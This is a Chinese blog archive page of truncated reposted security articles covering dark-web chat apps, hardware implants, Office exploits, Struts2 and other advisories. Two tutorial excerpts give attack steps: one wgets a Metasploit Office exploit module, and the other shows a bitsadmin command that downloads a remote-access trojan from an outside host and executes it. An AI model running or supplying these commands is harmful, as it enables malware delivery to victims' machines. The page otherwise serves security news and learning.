作者归档:rande
Discord成为暗网中最受欢迎的通讯APP【转】
即便不支持端到端加密,Discord服务仍然突破“重重包围”一举成为了暗网中网络犯罪分子们最喜爱的通讯应用。
可能你还不敢相信,根据暗网威胁情报公司IntSights在本周发布的分析报告,Discord的受欢迎程度要比排名第二的Telegram高出九倍之多。为了评估网络犯罪分子使用即时通信服务的情况,这份报告中的数据追踪并记录下了在2016年7月到2017年7月之间热门暗网网络犯罪平台上所有的即时通信邀请。
网络犯罪分子使用即时通信服务的情况暴增了三十倍
首先,这项研究的分析成果显示,网络犯罪分子使用即时通信服务的情况相较于以前增长了三十倍左右。你可能第一反应会认为,这是因为之前的三大热门暗网市场(AlphaBay、Hansa和RAMP)倒闭了,所以网络犯罪分子们才不得已使用即时通信应用来进行“沟通交流”。但事实并非如此,因为这三大暗网市场是在7月份被关停的,而这项研究的数据统计是在这之前完成的,因此这两者之间并没有多大关系。所以,这很可能是暗网网络犯罪社区自发地开始转向使用即时通信应用了,而并非是受交易平台被关停的影响。
Discord的受欢迎程度要比排名第二的Telegram高出九倍
报告中还有一个数据非常惊人,即Discord应用的受欢迎程度。这项服务并不支持端到端加密,因此当执法部门要求获取用户数据时,没有任何措施可以保护这些网络犯罪分子们的聊天信息。但既便是如此,这个拥有450万用户的小型移动端即时信息平台其受欢迎程度仍然要比排名第二的Telegram高出九倍。
请大家看看下面这张统计图表,在这项研究进行数据统计的过程中,Discord一直都是网络犯罪分子们的最爱。
需要注意的是,网络安全公司Flashpoint在四月份曾发布过一份类似的报告,但是在他们的这份报告中根本就没有提到Discord的名字,这很可能是因为两家公司收集数据的方式不同,因为IntSight主要是通过分析私聊对话和群组聊天中的邀请链接来进行数据收集的。
话虽如此,但这两家公司的报告中部分细节内容还是相符的,例如今年第一季度中ICQ的普及程度大大提升,这一点在IntSights的报告中也有体现。
Tor的安卓客户端目前仍有大量用户使用
…吓人!修手机被植入黑客芯片 隐私全泄露【转】
更换手机零部件是维修手机的主要方法之一,不过最近国外一项新的研究表明,更换手机零件也会有数据被盗的风险。
根据Engadget消息,来自以色列本古里安大学的研究人员透露,第三方手机触摸屏中可以嵌入恶意集成芯片,该芯片可以执行一些盗窃数据的任务,而研究团队已经在华为Nexus 6P和LG G Pad中验证了他们的理论。根据研究人员的说法,恶意芯片会记录用户的键盘输入,并拍摄用户照片,在用户不知不觉的情况下通过电子邮件的方式进行转发,同时还会预装一些应用程序,引导用户进入钓鱼网站。另外恶意芯片还会利用手机操作系统内核中的漏洞进行二次攻击,并对手机其他硬件造成伤害。
更可怕的是,研究人员认为,安装了恶意芯片的屏幕看起来与一般的屏幕并没有任何区别,即使在很专业的技术人员眼中也无法被察觉到差异。而芯片在进行恶意攻击时也不会创建任何文件,所以防毒软件也检测不到。
研究人员发现恶意攻击芯片成本不高。为了安装芯片执行恶意任务,研究人员使用了一个运行在ATmega 328微控制器模块上的Arduino平台。他们还使用了一个STM32L432微控制器,并补充说明几乎大部分的微型控制器都可以实现恶意攻击这一点。之后,他们使用热风鼓风机将触摸屏控制器和主件板分开,接下来,他们焊接了铜线,将芯片连接在手机之中。
虽然这个装置看起来还比较明显,但是研究团队声称只要稍加努力就可以轻而易举地将组件隐藏在硬件设备之中。值得一提的是,这种带有恶意攻击芯片的屏幕不仅仅出现在Android手机,iPhone屏幕同样也可以成为被植入目标。
…
CVE-2017-0199利用【转】
大家好,我是Alex。今天教大家简单复现一个office漏洞CVE-2017-0199
下载漏洞利用脚本
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat,然后打开msf生成hta文件链接
然后使用刚才下载的exp设置参数
Run后复制文件到靶机测试
查看回话
…
CVE-2017-11882利用大全【转】
大家好,我是Alex。今天教大家有效利用OFFICE这个漏洞!首先使用HTA脚本远程下载和执行远控马~
新建一个HTA脚本
bitsadmin /transfer officehttp://192.168.1.19:81/office.exe c:\office.exe & c:\office.exe
PS:加入/setpriority来提高任务的优先级(加速),加入vbhide来隐藏下图那恼人的窗口
上传到web目录或者使用其他工具建立下载链接…
【漏洞预警】Apache Struts2 再爆漏洞(ST2-054,ST2-055) 通告【转】
2017年12月1日,Apache Strusts发布漏洞编号为CVE-2017-15707(S2-054)的安全漏洞,漏洞危害程度为中等(Moderate)。由于Apache Struts REST插件使用了过时的JSON-lib库,这个库很容易受到攻击,攻击者可以通过构造特制的JSON恶意请求造成DOS攻击。
https://cwiki.apache.org/confluence/display/WW/S2-054
S2-055漏洞简述:
2017年12月1日下午,Apache Strusts发布漏洞编号为CVE-2017-7525(S2-055)的安全漏洞,漏洞危害程度为中等(Moderate)。由于Apache
…我是如何黑进成人生活网站Pornhub拿到2万美元赏金的【转】
老司机们对Pornhub也不会陌生了(//∇//)\,此处略去一万字…作者是如何黑进pornhub的呢?这一切都要从那日作者打开pornhub说起…
概要:
笔者获取了pornhub.com的远程执行代码,并且在Hackone上赚取了2万美元的漏洞赏金。
笔者在PHP…
大量无线键盘存在KeySniffer漏洞,可嗅探用户输入【转】
几美元的一根天线、一个无线发射器,还有几行Python代码,有了这些,黑客就可以在几十米开外主动地记录下你的用户名、密码、信用卡、你写的稿子,总之就是你用无线键盘输入的任何东西。
黑客所利用的是一种无线键盘漏洞,这种漏洞无法轻易防范,而且很难想到。来自Bastille安全公司的研究人员率先发现了这一漏洞,并把它命名为KeySniffer。
影响设备
研究人员对12款来自知名厂商的键盘进行了测试,发现其中8款能被窃听,但是实际上这个列表还远不及真正存在漏洞的数量。这个漏洞波及的范围实在太大,研究人员相信有大量的设备存在漏洞。
与此同时,厂商的态度也令人失望。Bastille首席研究官Ivan O’Sullivan称,“大部分的厂商还没有回应我们披露的信息。”
演示视频
升级版的MouseJack
GNU tar 解压路径绕过漏洞(CVE-2016-6321) 分析【转】
Author: LG(知道创宇404安全实验室) Date: 2016-11-09
0x00 漏洞概述
1.漏洞简介
GNU tar文档管理命令是Linux系统下常用的一个打包、压缩的命令。经
CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)【转】
*本文原创作者 Lz1y,本位属于 FreeBuf 原创奖励计划,禁止转载
CVE-2017-8759 是前几天出的 0 DAY ,搜了下,国内几乎没有人复现,这个洞总体来说,危害很大,而且比CVE-2017-0199 更难防御。…
最新Office 0day漏洞(CVE-2017-11826)在野攻击通告【转】
2017年9月28日,360核心安全事业部高级威胁应对团队捕获了一个利用Office 0day漏洞(CVE-2017-11826)的在野攻击。该漏洞几乎影响微软目前所支持的所有office版本,在野攻击只针对特定的office版本。攻击者以在rtf文档中嵌入了恶意docx内容的形式进行攻击。通过对攻击样本的C&C进行追踪溯源分析,我们发现攻击者从8月中旬开始筹备攻击,在9月底真正发动攻击,该漏洞在这段时间内为无补丁的0day状态。
360核心安全团队是第一家向微软分享该0day漏洞细节的安全厂商,我们一直与微软保持积极沟通,一起推进该0day漏洞在一周内发布安全补丁,让漏洞得到妥善解决后再披露漏洞信息。
最新版本的360安全产品可以检测并防止此0day漏洞的攻击,我们建议用户及时更新10月的微软安全补丁。
攻击简析
此次0day漏洞攻击在野利用真实文档格式为RTF(Rich Text Format),攻击者通过精心构造恶意的word文档标签和对应的属性值造成远程任意代码执行,payload荷载主要攻击流程如下,值得注意的是该荷载执行恶意代码使用了某著名安全厂商软件的dll劫持漏洞,攻击最终会在受害者电脑中驻留一个以文档窃密为主要功能的远程控制木马。
总结及防护建议
在发现攻击时,360安全卫士已针对该漏洞进行了紧急的热补丁防护升级,使360用户在微软10月安全补丁未发布前,也可以有效防护该Office …